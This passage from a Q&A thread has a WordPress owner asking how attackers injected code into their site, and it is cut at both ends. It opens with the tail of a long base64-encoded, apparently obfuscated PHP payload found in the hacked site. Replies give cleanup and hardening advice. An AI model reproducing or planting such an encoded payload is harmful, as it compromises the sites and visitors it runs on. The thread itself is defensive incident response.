ZJLy6KRFEokfHhXQaLLTChlic49nrkQVcEKp6vmBUQ+oohQNm+Q6F48fuhZYcazaPg+aHx3nygPmD+8miKBnGSmJSNBW7Xp96QUCm4fPM93iYJOeujRCx2y5TW6QuhH75PJ1YgGnTUAqnkiJvWud93rdL2I4bHnO2DxflWlbN7Sr6n6Cryg3wqLHrKJp9ZYWk61XcvyImj0y1Iho3OeYhuqj5Z2qUd31aOzhgg6VwQ1sCOLZua8xDgIRWxUWlzvO5F86lERrwa4JbJbV1ospPPiSrEDhKueAxcym0GZwWhbYi13OViLiD5ShmSur4bCxUVCyuTUZM9NmA2zrS2jSl/9Gz814XX2g+NXR++aALvrrfoQO2OIJKXFiWiprUCNz9koO4zSFLxryNmlgNdrQXlkEK4w3KR+xNZSucm0oZZ4wvbgi1hkqWgoZDlOB0ScU5Yq0A2G9+Z67OSK5IUqk1CaDuZFnNNGRA5bZ+tmICTzZoJgK3rj6jAqkEWUnEZGhae+/Obeh1CnNfNV4A32lbot+M+IXs2ml9hlFRsOmE8qh3l2kXtt5Z4qUyNwdF1BOPIQGLz9/uT0zOfM8s/p+VEvA/Y5C4ChlQVvyBHbWVhmyN8yGUsBGfz9iJRmeQS1IJEQ+tDr+WVclD7LuKYW6nh4lXmN7/+heRvAau+EO37zz4NXxy8G745++PHo5FSrNEpiFkA3L9I4ngWdLfAgVHapDeoS0aNWJJiadMCFr7KCaO6BuqXOo5hHXRPiDTdcWQzTILnKRoBynDQ44UPHl1jhQqKPX6hVgaT7LOZCG5hNT/2Lj2BXPZrNqYK4YjQlGXNPfjw8PDo5EUz13EPBYF8SxfbjuyM5AMtkdac1wTKmT5luneVN1sEzBhy09vfW/j/YpP2B')));
```

Comment: then i change eval to print and the code show i can able to put here bcz its too many characters which is not allowed by stack. if someone print it and help me to figure it out how they get in so i will block that path. i shall be really thankful

Comment: Have you contacted your host. They should be able to help you with this

Comment: It is unlikely that the information you posted can help us diagnose how your site got hacked in the first place.  As a matter of fact, they probably won't touch the component which allowed them to get in.

Answer (score 1, accepted):

This is 3rd party injunction. this is a common problem in non secure worpress sites. Plz check the main files in your host like index.php,Header.php, footer.php, functions.php in all themes and manually clean the codes from the file them re upload.Site will work fine. After clean up insall wp security plug-ins like file monitor. wordfence security. and monitor the activities properly add the injection prevention codes in .htaccess files. and change the file permission from 777 to suitable for your server.

Comment: thanks for your reply i have wordfency security plugin installed and i have checked the rootfiles and theme files and i did't find any code which call the root file to execute. this is why i get frustrated.

Comment: @MuhammadWaqas try some anti virus plug-in that will manually check your files and sent shows the malware codes inside the theme folder. not the root. add wp file monito  plus that will notify u if any changes added in ur files. like the code change.

Comment: Thanks @nith for you help can you please guide me which antivirus plugin is best. :)

Comment: @MuhammadWaqas am using this http://wordpress.org/plugins/antivirus/screenshots/

Answer (score 1):

change the file permission and add some security plugins. Add file block i